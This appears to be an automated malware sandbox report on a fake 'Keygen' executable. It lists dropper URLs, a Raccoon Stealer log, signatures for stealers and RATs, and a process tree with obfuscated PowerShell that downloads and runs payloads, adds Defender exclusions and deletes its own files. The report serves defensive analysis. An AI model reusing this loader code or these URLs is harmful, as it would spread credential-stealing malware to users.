Overview

overview

10

Static

static

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...0).exe

windows7_x64

10

201001-nyh...0).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

8

201001-nyh...1).exe

windows7_x64

10

201001-nyh...1).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...5).exe

windows7_x64

10

201001-nyh...5).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...6).exe

windows7_x64

10

201001-nyh...6).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...7).exe

windows7_x64

10

201001-nyh...7).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...8).exe

windows7_x64

10

201001-nyh...8).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...9).exe

windows7_x64

10

201001-nyh...9).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...2).exe

windows7_x64

10

201001-nyh...2).exe

windows10_x64

10

201001-nyh...3).exe

windows7_x64

10

201001-nyh...3).exe

windows10_x64

10

201001-nyh...4).exe

windows7_x64

10

201001-nyh...4).exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...я.exe

windows7_x64

10

201001-nyh...я.exe

windows10_x64

10

201001-nyh...en.exe

windows7_x64

10

201001-nyh...en.exe

windows10_x64

10

Resubmissions

02-10-2020 21:14

201002-pjxdl9y6a6 10

01-10-2020 20:51

201001-e45lwcxsnn 10

01-10-2020 20:51

201001-fhxddb9gwe 10

01-10-2020 20:51

201001-ts8hns28ea 10

01-10-2020 20:51

201001-v1kt3kgljx 10

01-10-2020 20:51

201001-d2fbtjzv4s 10

01-10-2020 20:51

201001-cgj9prs442 10

01-10-2020 20:49

201001-t1jnpvwcgx 10

Analysis

  • max time kernel
    70s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10v200722
  • submitted
    01-10-2020 20:51

General

  • Target

    201001-nyhbt4p25j_pw_infected/Keygen — копия (33).exe

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Path

C:\Users\Admin\AppData\LocalLow\machineinfo.txt

Family

raccoon

Ransom Note
[Raccoon Stealer] - v1.5.13-af-hotfix Release Build compiled on Mon Jul 6 14:33:02 2020 Launched at: 2020.10.02 - 03:08:06 GMT Bot_ID: 18823CA4-5761-4226-8787-CF36135F1C68_Admin Running on a desktop =R=A=C=C=O=O=N= - Cookies: 0 - Passwords: 5 - Files: 0 System Information: - System Language: English - System TimeZone: -0 hrs - IP: 154.61.71.13 - Location: 37.750999, -97.821999 | ?, ?, United States (?) - ComputerName: LZUKLIOU - Username: Admin - Windows version: NT 10.0 - Product name: Windows 10 Pro - System arch: x64 - CPU: Persocon Processor 2.5+ (2 cores) - RAM: 4095 MB (841 MB used) - Screen resolution: 1280x720 - Display devices: 0) Microsoft Basic Display Adapter ============

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers.

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

  • Contains code to disable Windows Defender 4 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • ModiLoader, DBatLoader

    ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Oski

    Oski is an infostealer targeting browser data, crypto wallets.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Raccoon log file 1 IoCs

    Detects a log file produced by the Raccoon Stealer.

  • ModiLoader First Stage 1 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 27 IoCs
  • Loads dropped DLL 15 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Suspicious use of SetThreadContext 9 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 3 IoCs
  • Kills process with taskkill 4 IoCs
  • Modifies registry class 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 49 IoCs
  • Suspicious use of SetWindowsHookEx 9 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (33).exe
    "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — копия (33).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3908
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AACC.tmp\start.bat" "C:\Users\Admin\AppData\Local\Temp\201001-nyhbt4p25j_pw_infected\Keygen — ????? (33).exe""
      2⤵
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:2776
      • C:\Users\Admin\AppData\Local\Temp\AACC.tmp\Keygen.exe
        Keygen.exe
        3⤵
        • Executes dropped EXE
        • Suspicious use of SetWindowsHookEx
        PID:1436
      • C:\Windows\SysWOW64\mshta.exe
        "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AACC.tmp\m.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3824
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iguyoamkbvf $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iguyoamkbvf umgptdaebf $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|umgptdaebf;iguyoamkbvf rsatiq $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL2JpdC5kby9mcWhIVA==';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);rsatiq $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Users\Public\wds.exe
            "C:\Users\Public\wds.exe"
            5⤵
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious behavior: MapViewOfSection
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:5068
            • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
              "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              PID:4140
              • C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe
                "C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe"
                7⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Checks processor information in registry
                PID:3976
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c taskkill /pid 3976 & erase C:\Users\Admin\AppData\Local\Temp\FVjhgtresfdbv.exe & RD /S /Q C:\\ProgramData\\114613304966265\\* & exit
                  8⤵
                    PID:3776
                    • C:\Windows\SysWOW64\taskkill.exe
                      taskkill /pid 3976
                      9⤵
                      • Kills process with taskkill
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3404
              • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                6⤵
                • Executes dropped EXE
                • Suspicious use of SetThreadContext
                • Suspicious behavior: MapViewOfSection
                • Suspicious use of SetWindowsHookEx
                PID:4396
                • C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe
                  "C:\Users\Admin\AppData\Local\Temp\NHtrdsaghfDF.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4612
              • C:\Users\Public\wds.exe
                "C:\Users\Public\wds.exe"
                6⤵
                • Executes dropped EXE
                • Loads dropped DLL
                • Drops desktop.ini file(s)
                PID:4512
                • C:\Users\Admin\AppData\Local\Temp\rM0UCSAEOw.exe
                  "C:\Users\Admin\AppData\Local\Temp\rM0UCSAEOw.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4372
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
                    "Powershell" Add-MpPreference -ExclusionPath '"C:\Users\Admin\AppData\Local\Temp\rM0UCSAEOw.exe"'
                    8⤵
                    • Suspicious use of AdjustPrivilegeToken
                    PID:744
                • C:\Users\Admin\AppData\Local\Temp\W388TBxxwG.exe
                  "C:\Users\Admin\AppData\Local\Temp\W388TBxxwG.exe"
                  7⤵
                  • Executes dropped EXE
                  PID:4360
                  • C:\Windows\SysWOW64\Notepad.exe
                    "C:\Windows\System32\Notepad.exe"
                    8⤵
                      PID:4652
                  • C:\Users\Admin\AppData\Local\Temp\Sr924dh6nn.exe
                    "C:\Users\Admin\AppData\Local\Temp\Sr924dh6nn.exe"
                    7⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    • Suspicious use of SetWindowsHookEx
                    PID:800
                    • \??\c:\windows\SysWOW64\cmstp.exe
                      "c:\windows\system32\cmstp.exe" /au C:\Windows\temp\vusrzlue.inf
                      8⤵
                        PID:4232
                    • C:\Users\Admin\AppData\Local\Temp\YA7TKC6dQs.exe
                      "C:\Users\Admin\AppData\Local\Temp\YA7TKC6dQs.exe"
                      7⤵
                      • Executes dropped EXE
                      • Windows security modification
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4992
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        "powershell" Get-MpPreference -verbose
                        8⤵
                        • Suspicious use of AdjustPrivilegeToken
                        PID:4780
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Public\wds.exe"
                      7⤵
                        PID:1416
                        • C:\Windows\SysWOW64\timeout.exe
                          timeout /T 10 /NOBREAK
                          8⤵
                          • Delays execution with timeout.exe
                          PID:4260
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AACC.tmp\m1.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3488
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy UnRestricted -Window 1 [void] $null;$wdxubevfic = Get-Random -Min 3 -Max 4;$qidanupkvwj = ([char[]]([char]97..[char]122));$jfwlpghdovb = -join ($qidanupkvwj | Get-Random -Count $wdxubevfic | % {[Char]$_});$hdxnlosbpmk = [char]0x2e+[char]0x65+[char]0x78+[char]0x65;$zdkhpw = $jfwlpghdovb + $hdxnlosbpmk;$sypim=[char]0x53+[char]0x61+[char]0x4c;$xzrhm=[char]0x49+[char]0x45+[char]0x58;$edxlnf=[char]0x73+[char]0x41+[char]0x70+[char]0x53;sAL iyhxbstew $sypim;$kjavpydntew=[char]0x4e+[char]0x65+[char]0x74+[char]0x2e+[char]0x57+[char]0x65+[char]0x62+[char]0x43+[char]0x6c+[char]0x69+[char]0x65+[char]0x6e+[char]0x74;iyhxbstew bruolc $xzrhm;$andcvkhb=[char]0x24+[char]0x65+[char]0x6e+[char]0x76+[char]0x3a+[char]0x50+[char]0x55+[char]0x42+[char]0x4c+[char]0x49+[char]0x43|bruolc;iyhxbstew cplmfksidr $edxlnf;$bykmo = $andcvkhb + [char]0x5c + $zdkhpw;;;;$zvngemsbua = 'aHR0cDovL3p4dmJjcnQudWcvenhjdmIuZXhl';$zvngemsbua=[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($zvngemsbua));$mzyjvgc = New-Object $kjavpydntew;$ihtxzqnbs = $mzyjvgc.DownloadData($zvngemsbua);[IO.File]::WriteAllBytes($bykmo, $ihtxzqnbs);cplmfksidr $bykmo;;$pnsva = @($uwgibvlp, $ulzwsymt, $fzlbxhr, $rgkeho);foreach($tgmqlbc in $pnsva){$null = $_}""
                  4⤵
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3288
              • C:\Windows\SysWOW64\timeout.exe
                timeout 1
                3⤵
                • Delays execution with timeout.exe
                PID:3428
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Local\Temp\AACC.tmp\b.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:3868
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
